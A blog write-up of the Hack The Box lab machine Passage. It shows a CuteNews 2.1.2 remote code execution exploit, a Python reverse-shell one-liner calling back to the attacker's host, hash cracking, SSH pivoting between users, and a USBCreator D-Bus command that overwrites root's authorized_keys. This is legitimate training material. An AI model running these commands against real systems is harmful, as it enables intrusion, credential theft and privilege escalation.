25th October 2021
Hack The Box Passage Write-Up by T13nn3s

Hack The Box – Passage – 10.10.10.206

“None shall pass.” – “I have no quarrel with you, good Sir Knight, but I must cross this bridge.” – “Then you shall die.”

Monty Python and the Holy Grail

About Passage

In this post, I’m writing a write-up for the machine Passage from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Passage is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15, and submitting the root flag your points will be raised by 30.

Foothold
After the initial port scan, I found two open ports: 22/tcp and 80/tcp. I jumped on the HTTP port and directly starting brute-forcing the directories. But, after some requests, my machine is not able to connect anymore to the webserver. After 2 minutes waiting, I have access again and on the webpage, I saw that ‘Fail2Ban’, is implemented. I found that this webserver is running CuteNews 2.1.2, which has a known Remote Code Execution vulnerability. I downloaded the exploit and gained the foothold.

User
From the RCE I got access as ‘www-data’ in the files of CuteNews I found a directory named ‘cdata’ and in this directory, I found a directory ‘Users’ which contained a bunch of PHP-files. One of the files contained a base64 encoded string and after the decoding I found an SHA-256 hashed password. After cracking this password, I got access to the user ‘Paul’. The ‘authorized_keys’. file of Paul contains the key from the user account of Nadav. Nadav can SSH into the account of Paul, without the use of any password. And, Paul can SSH into the account of Nadav without the use of any password. So, I jumped over the account of Nadav with SSH and grabbed the user flag.

Root
From this part, I got a little bit stuck. After reading the file ‘.viminfo’ in the user’s home folder of Nadav, I found that the ‘com.ubuntu.USBCreator.conf’ is present on this machine. The Threat Intelligence Team from Palo Alto, Unit42, had found a vulnerability in this service. I have exploited this vulnerability and copied the ‘authorized_keys’ from the user Nadav to the ‘authorized_keys’ file of the root user and I was able to SSH from Nadav into the root user’s account without any password and grabbed the root flag.

Machine Info

Hack The Box Passage Write-Up by T13nn3s
Hack The Box Passage Machine Info
Hack The Box Passage machine IP and maker
Hack The Box Passage Machine IP and maker

Recon

Port scan

As always I start the box with a port scan with Nmap.

~$ nmap -sC -sV -oA ./nmap/10.10.10.206 10.10.10.206

The results.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 21:18 CEST
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.60 seconds
MBP-from-t13nn3s:passage madij$ sudo nmap -sC -sV -oA ./nmap/10.10.10.206 10.10.10.206
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 21:18 CEST
Nmap scan report for 10.10.10.206
Host is up (0.066s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.50 seconds

This machine has two open ports. According to the open ports, I can determine that this machine is acting as a web server. The HTTP title is showing me ‘Passage News’, let’s go to find out if this box can learn me something new.

Enumeration Web Server

I jumped to the http://passage.htb, but the website shows an ‘unable to load’ error. After some time the website is accessible, strange behavior. Website and it’s showing me the ‘Passage News’ webpage. This webpage contains some articles, I see an RSS button.

It’s now clear to me why the page was unable to load. The owners of this website had implemented ‘Fail2Ban’. My recon script directly launched a directory brute-force, which activated the ban on my IP-address. When I hover over the hyperlink ‘admin’, I get the email address [email protected]. I got an email address, maybe a username.

Hack The Box Passage News Website
http://passage.htb

The article ‘**Implemented Fail2Ban** has the URL http://passage.htb/index.php?id=11, when I replace the ’11’ with an apostrof, I get an error: ‘@SYSLOG: INTERNAL ERROR[2]’. It’s not an MySQL error. If this was a SQL error, then this website is vulnerable for SQL Injection.

Hack The Box Passage SQL vulnarebility
http://passage.htb/index.php?id=11 SQL Error

However, let check this further. I need to find the loginpage. After some Googling I found that the webpage has to be http://baseurl/cutenews. After some trying, the URL http://passage.htb/CuteNews is working, I get the loginpage.

Hack The Box Passage CuteNews loginpage
http://passage.htb/CuteNews

From the login page, I see that this website is using CuteNews version 2.1.2. Through searchsploit, I found that this version is vulnerable to 3 vulnerabilities.

~$ searchsploit cutenews
...
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)                                                                                           | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion                                                                                                               | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload                                                                                                   | php/webapps/48458.txt
...

Intrusion

CVE-2019-1147

Two of the three vulnerabilities are ‘Authenticated’ exploits. So, I need to create an account to use these exploits. I registered an account with the following details:

User Name: T13nn3s
Nickname: T13nn3s
Password: mypassword
Email: [email protected]
Hack The Box Passage account creation
http://passage.htb/CuteNews/index.oho?register

I have now an account. I’m gonna use the CuteNews 2.1.2 – ‘avatar’ Remote Code Execution vulnerability, which lookup to CVE-2019-1147. Metasploit has a module for this CVE, but I do not want to use Metasploit. From Github, I found this Proof-Of-Concept (POC). I cloned this repository to my machine.

After the clone of the repo, I can start this exploit to get a Remote Code Execution.

~$ python3 CVE-2019-11447.py T13nn3s mypassword http://passage.htb/CuteNews
-.-. --- --- .-..    .... ....- -..- --- .-.    -... .- -. -. . .-.
[*] Detected version 'CuteNews 2.1.2'
[*] Grabbing session cookie
[*] Logging in as T13nn3s:mypassword
[+] Login Success!
[*] Grabbing __signature_key and __signature_dsi needed for pofile update request
[+] __signature_key: 2381e7f4640a03486e71d27f7be156e6-T13nn3s
[+] __signature_dsi: 5305d9ae97a28731cf072747b4efedb6
[*] Uploading evil avatar... Done!
[*] Validating that the file was uploaded... Yup!
[+] http://passage.htb/CuteNews/uploads/avatar_T13nn3s_9750.php?cmd=<cmd>
[*] Looks like everything went smoothly, lets see if we have RCE!
[*] Keep in mind that this shell is limited, no STDERR

$> whoami
www-data

I got access to this machine as the user www-data. Let’s first establish a stable shell with a reverse shell to my machine. I checked first if this machine has Python3 installed and if so I can create a reverse shell with Python3.

$> which python3
/usr/bin/python3
$> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The reverse shell is established and directly upgraded the shell to a PTY shell.

~$ netcat -lvvp 4444
Listening on any address 4444 (krb524)
Connection from 10.10.10.206:46344
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/var/www/html/CuteNews/uploads$

There are two user accounts listed on this machine. I have no access to their home folders. The next step is to jump to one of this users.

[email protected]:/var/www/html/CuteNews$ cd /home
cd /home
[email protected]:/home$ ls -lh
ls -lh
total 8.0K
drwxr-x--- 17 nadav nadav 4.0K Sep 17 12:54 nadav
drwxr-x--- 16 paul  paul  4.0K Sep  2 07:18 paul
[email protected]:/home$

Lateral Movement

Move from www-data to Paul

I’ve searched through the file, located in the webserver directory. In the directory /var/www/html/CuteNews/cdata/users, I found several PHP-files. I decided to walk manually through these files. In the file b0.php, I found a base64 encoded string.

[email protected]:/var/www/html/CuteNews/cdata/users$ cat b0.php
cat b0.php
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19
[email protected]:/var/www/html/CuteNews/cdata/users$ 

After decoding this string, I found this hash as a password: e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd.

~$ echo "YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19" | base64 -d
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"[email protected]";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}

I cracked this password with Crackstation.

Hack The Box Passage crack the password
Cracked the password with Crackstation

It seems it’s a SHA256 password and the hash is in the database of Crackstation. The password: atlanta1

Now, I can jump to the user Paul.

/var/www/html/CuteNews/cdata/users$ su paul
Password: atlanta1

[email protected]:/var/www/html/CuteNews/cdata/users$ cd /home/paul
cd /home/paul
[email protected]:~$ cat user.txt
cat user.txt
a1c6a53e2139f799dca56ae19442883a
[email protected]:~$ 

Move from Paul to Nadav

My first intention was to go for a Privilege Escalation but got stuck on that part. Then I have searched all the files in the home directory of Paul, and after some time I found something interesting in the /home/paul/.ssh folder. In the ‘authorized_keys’ file, I found the key from the user account ‘nadav’!

[email protected]:~/.ssh$ ls
ls
authorized_keys  id_rsa  id_rsa.pub  known_hosts
[email protected]:~/.ssh$ cat authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d [email protected]
[email protected]:~/.ssh$

So, Nadav can SSH into the account of Paul, without the use of a password. Why is that? Apparently, they trust each other so much. Usually, this trust is two-way, maybe Paul can build up an SSH session to Nadav without a password?

[email protected]:~/.ssh$ ssh [email protected]
ssh [email protected]
The authenticity of host '10.10.10.206 (10.10.10.206)' can't be established.
ECDSA key fingerprint is SHA256:oRyj2rNWOCrVh9SCgFGamjppmxqJUlGgvI4JSVG75xg.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '10.10.10.206' (ECDSA) to the list of known hosts.
Last login: Mon Aug 31 15:07:54 2020 from 127.0.0.1
[email protected]:~$ whoami
whoami
nadav
[email protected]:~$

Yes! I have now access to the account of Nadav. Let’s start the last phase: Privilege Escalation.

Privilege Escalation

Enumeration

I first checked from which groups is the user Nadav member of. It seems that he is member of the ‘sudo’. group, that’s interesting. This is definitly the user from where I have to escalelate the privileges from.

[email protected]:~$ id
id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
[email protected]:~$

I downloaded the enumeration script ‘LinEnum.sh’ from my attacker machine to this box, but this script is not finding any special. After receiving a nudge, I know I have to look at the files in the home folder, like the previous steps for Paul and Nadav. I have checked all the files in the user’s Nadav home folder. The file .viminfo, contains interesting information.

[email protected]:~$ cat .viminfo                                                                                                                                                            
cat .viminfo
...                                                                                                                                                                            
# File marks:
'0  12  7  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
'1  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

# Jumplist (newest first):
-'  12  7  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
-'  1  0  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
-'  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-'  1  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-'  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-'  1  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

# History of marks within files (newest to oldest):

> /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
        "       12      7
...

I noticed the com.ubuntu.USBCreator.conf part in this file, and checked this on Google, and found an article from Palo Alto’s Global Threat Intelligence Team, Unit42. The article: USBCreator D-Bus Privilege Escalation in Ubuntu Desktop.

USBCreator D-Bus Privilege Escalation in Ubuntu Desktop
In July 2019, Unit42 had found a vulnerability in the USBCreator D-Bus, this part is from the Executive Summary from the article:

A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root – without supplying a password. This trivially leads to elevated privileges, for instance, by overwriting the shadow file and setting a password for root. The issue was resolved in June when Ubuntu patched the relevant packages in response to a vulnerability disclosure from Unit 42.

Exploitation

USBCreator D-Bus Privilege Escalation

As the article describes the specific service com.ubuntu.USBCreator is running as root. The user Nadav is member of the sudoers group, This is required in order to be able to abuse the vulnerability. I have inspected this service, but this service is not running on this box, that strange.

[email protected]:~$ ps awx | grep USB
ps awx | grep USB
  4559 pts/18   S+     0:00 grep --color=auto USB
[email protected]:~$ 

So, the service is not running at this moment. maybe, the service will startup when I try to exploit this service. I used the payload below. It will overwrite the ‘authorized_keys’ of the user root, with the keys from the user Nadav, so that I can create an SSH session without the use of any password.

[email protected]:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/.ssh/authorized_keys /root/.ssh/authorized_keys true
<or.Image /home/nadav/.ssh/authorized_keys /root/.ssh/authorized_keys true   
()
[email protected]:~$

Payload worked! I have now access as the user root! Get the flag and the box is done.

[email protected]:~$ ssh [email protected]
ssh [email protected]
The authenticity of host '10.10.10.206 (10.10.10.206)' can't be established.
ECDSA key fingerprint is SHA256:oRyj2rNWOCrVh9SCgFGamjppmxqJUlGgvI4JSVG75xg.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '10.10.10.206' (ECDSA) to the list of known hosts.
Last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1
[email protected]:~# whoami
whoami
root
[email protected]:~# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# cat root.txt
cat root.txt
64921db9b28bb43ac2d8681bd9b574c1
[email protected]:~#

I checked now if the service is running, and it is! I just started this service by exploiting it. So, default this service is not in a running state so that the enumeration scripts are not picking up this service.

[email protected]:~# ps aux | grep usb
ps aux | grep usb
root       4568  0.0  0.4 235544 19976 ?        Sl   01:36   0:00 /usr/bin/python3 /usr/share/usb-creator/usb-creator-helper
root       4710  0.0  0.0  21292   924 pts/19   S+   02:02   0:00 grep --color=auto usb
[email protected]:~#

Did you liked this write-up? Did you enjoy reading this write-up? I did enjoy writing it and hacking this box. Please consider giving me a point of respect, I really appreciate that! My Hack The Box profile: https://app.hackthebox.eu/profile/224856.

This blog is totaly free and I spend my spare time by writing articles an doing machines on Hack The Box. I’m not using any advertisements from Google or other advertisement programs, because they gather many data from you. Please help me to keep this website free of advertisements and consider to support me.

Buy me a coffeeBuy me a coffee

Happy Hacker Face!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *